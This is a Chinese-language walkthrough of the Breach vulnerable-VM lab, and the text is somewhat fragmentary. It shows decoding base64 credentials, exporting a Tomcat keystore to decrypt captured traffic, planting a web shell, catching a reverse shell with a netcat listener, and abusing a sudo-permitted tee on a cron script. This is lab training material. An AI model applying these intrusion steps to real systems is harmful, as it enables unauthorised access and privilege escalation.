打開靶場 固定ip須要更改虛擬機爲僅主機模式 192.168.110.140html
打開網頁http://192.168.110.140/index.htmljava
查看源代碼發現能夠加密字符串python
猜想base64 解密 cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh 獲得這個結果多是二次加密在base64解密mysql
獲得 pgibbons:damnitfeel$goodtobeagang$ta 去除: 獲得兩個字符串pgibbons,damnitfeel$goodtobeagang$talinux
點擊圖片每一個路徑都看看發現web
能夠登陸 把剛剛拿到的兩個密碼進行嘗試登陸sql
登陸成功 發現有3個郵件shell
192.168.110.140/.keystore 這個地址 爲 ssl 加密證書的密鑰庫 繼續搜索有用文件tomcat
發現 有信息泄露 經過郵件信息猜想 tomcat bash
發現 pcap 文件 爲 wireshark 流量包 能夠下載來分析
都是加密過的 能夠利用前面的ssl 解密 利用java 的 keytool 獲取證書 輸入
D:\jdk\bin>keytool.exe -list -keystore
輸入密鑰庫口令:tomcat
密鑰庫類型: jks
密鑰庫提供方: SUN
您的密鑰庫包含 1 個條目
tomcat, 2016-5-21, PrivateKeyEntry,
證書指紋 (SHA1): D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53
Warning:
JKS 密鑰庫使用專用格式。建議使用 "keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\jdk\keystore -deststoretype pkcs12" 遷移到行業標準格式 PKCS12。
解密出來 結果
接着導出 p12 證書
輸入
keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat
證書有了 咱們就能夠查看了 打開Wireshark 編輯--首選項--Protocols--SSL,點擊右邊的Edit:
這裏上傳馬之後每隔3分鐘會自動刪除 因此咱們直接利用他反彈一個shell 這裏能夠用linux 自帶的也能夠 用msf 生成
本機 輸入 nc.exe -lvp 4444
進入項目後直接能夠查看項目尋找到 兩個特殊文件
看到mysql 的用戶密碼
輸入
發現 milton 用戶 去 etc/passwd
發現對應用戶 猜想就是這個用戶密碼
接着查詢這個用戶可否sudo 執行
sudo -l
沒發現可利用的 再重新找線索
uname -a
tEXtComment 和coffeestains
利用這兩個嘗試登陸
登陸成功
blumbergh@Breach:~$ sudo -l sudo -l Matching Defaults entries for blumbergh on Breach: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User blumbergh may run the following commands on Breach: (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
可以以root 權限執行
/usr/bin/tee /usr/share/cleanup/tidyup.sh
在去查看歷史命令
cd / blumbergh@Breach:/$ cd usr cd usr blumbergh@Breach:/usr$ cd share cd share blumbergh@Breach:/usr/share$ cd cleasnup cd cleasnup -su: cd: cleasnup: No such file or directory blumbergh@Breach:/usr/share$ cd cleanup cd cleanup
cat tidyup.sh
#!/bin/bash #Hacker Evasion Script #Initech Cyber Consulting, LLC #Peter Gibbons and Michael Bolton - 2016 #This script is set to run every 3 minutes as an additional defense measure against hackers. cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf
3分鐘刪除一次剛剛上馬的路徑
cat 查看
等待nc 反彈
成功 記得 python -c 'import pty;pty.spawn("/bin/bash")' 顯示終端